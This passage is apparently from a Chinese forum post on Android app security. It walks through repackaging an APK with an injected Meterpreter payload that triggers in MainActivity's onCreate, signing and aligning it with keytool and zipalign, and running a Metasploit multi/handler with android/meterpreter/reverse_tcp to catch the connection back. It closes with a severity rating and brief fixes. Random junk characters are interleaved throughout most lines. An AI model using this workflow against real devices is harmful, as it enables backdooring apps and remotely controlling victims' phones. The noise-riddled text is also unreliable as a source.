1 B. q3 t$ y4 X, A6 G# D9 o" V0 f T& J6 F keytool -printcert -jarfile repackaged.apk ; h5 K8 M% c( S* p1 c6 q 3 B) s5 H2 g9 [

9 _* }+ K" j' ^! t , k; p& V* j" W& p% }. Q, U" { 对齐 . ~% U, O+ D0 B5 m# _( W( W 5 s9 K5 i0 _- k. a/ M% ?

4 b. m& }% b$ a+ G: f6 X0 O- g* w. w) l6 B& n 字节对齐优化 / o2 U. E- H. D0 i6 m 8 \; w9 i+ r2 @9 l; N/ b

% M) }# p/ \* {3 i3 \% r; w0 S8 ]7 X8 L; N, l9 O5 F( ~ zipalign -v 4 repackaged.apk final.apk " _! s: P3 G% V. F+ \" M / d% `4 O i& a! F- e1 k- A4 Q

8 ?7 z: Q9 E" q1 \+ [0 R( I 6 i1 D' R- T% C, ?2 g0 f% O) l4 P 检查是否对齐 # ^% T1 X( P3 t8 U) M o & d6 k4 K% E# d/ B$ V; i

: p8 w1 p; U8 t) b 3 n# t* Z& V; z- _: Q1 X; _2 p: w zipalign -c -v 4 final.apk ( V- ~1 C* ?, z2 I" G1 j ' d; }: D; V$ m) V1 u

5 T" M; f$ |& z ^ 1 C3 H% q7 T" j0 p; y9 s/ m 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 # ?: d( s5 a1 \' E2 q. s& N + e& R y( h0 h3 Q/ h9 z( H

7 Q& D' u+ g0 k% v& N7 R$ o $ y) E9 I$ B* ~" D 启动Metasploit控制台，配置参数等待上线 8 x# p+ z' h/ W; P . v! `+ l% g5 T* S- b

: t* S) X) v" b" z! ?7 {5 A4 v! Z/ _# i' x6 P- Z 在终端依次输入如下命令 ( y# _# ^% [. z- L! c- V. L 8 \% i! R) }6 R

7 |2 p0 c# G$ K7 p% S8 J" @3 U& \8 G3 G* u3 y# l5 I msfconsole & \! U. j: b. j- ]# ^9 u 5 z X) [0 T- H! w' R

8 y1 K7 l: ]5 U7 q & ^% z5 X y D* W# i use exploit/multi/handler 8 G u# i0 a w9 Y5 B X / [2 [6 h* k/ ?+ m# |

) t- W0 j7 `* P 0 `: ]- o3 J( ^+ n- j" G) u1 B set PAYLOAD android/meterpreter/reverse_tcp 7 ^7 S4 q( f( k9 ?" {0 M 6 N4 r) ]2 A- P

& L. f# I5 t0 U+ l( c# C, N- T9 a * b K4 {9 E$ s T5 T. w set LHOST 192.xxx.xx.xx 4 o+ W2 b e. g, ? $ g' E$ e( o( q3 C$ _4 \6 c

; S5 S% s% U, _. e4 x q$ B3 H" Z9 H2 `* ~2 f& P1 d6 G set LPORT 4444 2 X5 w# L7 z B( F0 B" ~% |" s3 q + g4 W! c2 r: A3 ?( c6 v) C

+ f. y; b, x4 l/ Q; F5 q% ?1 o0 C) f 1 H5 x- ~1 w8 N% `" I exploit 9 T& E2 y3 l3 h( G3 R* n! J" z* X

) Y/ A. Y9 |" Y2 I4 B 8 o0 B7 g/ l; g0 i( \; b% g b 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 2 a; [' A1 p0 E* `' N6 f - d+ P/ u1 i0 [$ U9 r6 |3 M

7 N8 b$ n& W2 I4 h. o/ q 4 i+ O- H5 R$ u! c# _) t5 l 漏洞危害：中 6 v' `! m% d) X9 u; z * Q1 s5 w O5 w0 o

# d4 I, \+ ]$ z: U2 } ) e- X# p s+ l4 ] # i1 Z& Z3 s2 ?" D5 c( [2 J) j( r5 x/ e& b2 L' I 严重程度 $ G$ L( B" l) e" f' N* V , ~. F, ~4 e- L% X+ J ' m2 L7 R7 F. t3 f' {- F2 y. ~4 }6 H7 l5 p" D* N	$ k2 D2 B4 Z/ i . n4 r G/ p( M: i+ x q! X 5 i% P2 Q3 M4 u( b! m( D) K! X$ r" \|# B 高 3 b( F( `: B6 ] : Q2 M2 r2 Q. X& T+ q6 M0 q " d% G' v; G- e y( Q. e . N( T9 k) m; t+ V+ Z0 d7 G1 [3 e- K	' g( g$ f0 y u4 g) ?1 o 4 v' k( P: n! \5 x6 @ / @9 [- O$ D2 H+ P @" ? 1 F1 a, S# Y/ P ■ & A/ v4 ?+ j: n$ R" @7 l. X) Q5 ` {" c! H $ `% g: I, v/ d+ L2 c& v& q4 ?$ ?6 g9 _- F; }	6 x: M& a$ x$ K/ g' x+ D- y0 o0 }4 ^/ W; \ * I6 p1 c, H% y, t9 Q3 w0 h" I- r: `/ Z0 c 中 0 O# \|: M" T- _7 l$ _ # e- B" L! F$ q" o% b; c) @7 _' e 2 D) s4 c$ k5 ^9 M- ~9 Y4 ] 0 K8 x. M; F( k. P$ R% _	$ Q' v+ D6 I3 a9 _/ T ' _; A& o) z- k8 `2 P/ @& _ 6 v* f! S/ ]! M- v9 D1 W9 X1 R; E2 \|4 R9 e ! \2 d; z0 U: Y+ Q$ D / X- K7 f6 v; A 5 R T1 T( q' Z% Q( l, \% G9 ] $ _, g; I" v2 C( o/ R1 Y$ j' w* O 6 E8 q& ?# i4 d2 ?3 d2 f $ \|. p% r3 q+ ~+ a/ r8 s- }: @! t+ m3 U7 x- w5 u; I, Y& i- s	( ~1 y' b5 K* [! {! e2 H/ V4 b! z% k8 }: q, e" \| . N8 T2 S7 E. K* E% k! f z1 b% {2 e; l 低 ' n4 N9 l1 J2 @7 u; ]7 G! S, t . X ^# G* L& k, d2 a6 \|7 n& v7 q2 s ' N- N. u4 ^& z$ a+ a& z' a+ V . \7 {* [) r! G	c- \$ e7 ?' V6 Z' U ; }! o9 O; F h( ]* V6 D& S& r+ l0 H $ N8 x4 g7 o" P. A/ J7 e 7 y6 B7 p: Z2 c9 E 9 x. k! B& J( g8 a- x2 _1 j 2 ]' t' t+ w+ u; a) { 9 E* B, \3 b& U( V. \|+ S$ a3 H 3 l1 t4 n4 `0 ` X3 a) G 5 p- x4 t6 v" O+ n+ i' z1 a5 M; f5 t% m( a7 _

j2 x, K4 ]9 R" M" r; d$ h 8 ?% O8 c ]) p6 A& Q8 U ! Q& E6 e, L$ K9 G6 l + U3 |- G" k# o# a7 ~0 o

* o, H8 R1 |$ i9 Y2 }( H' l; b+ y" W 修复方法： 1 s* C' K0 w! P% V/ U; i2 Y% |: l 7 ^. E' x5 o' N/ c

1 ]" w- [5 ]$ ], n, {# o* m& n& X ! _& K3 |. A/ A% E 1.在 APP 启动时应做签名校验防止二次打包。
$ a) r& n& N, Q" m. Z: y2 }+ M# ^/ o: H, U 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 G) G( U& f4 P- ]; y5 K 5 |- N5 |5 l3 B. p

1 e1 e1 M! D8 E/ Y1 I) _7 D' ~% f) h/ \' }% ` - \7 `2 Z$ Y6 y) g6 b( } ; ^) S C: m7 J/ f

5 ^5 k/ o( `7 X, v. _& ^0 Y. V1 X3 ]% g% B$ [- Y0 u( ]
. S9 H7 Y3 e& K% d 1 _; b# n" W9 g

		自动登录	找回密码
密码			立即注册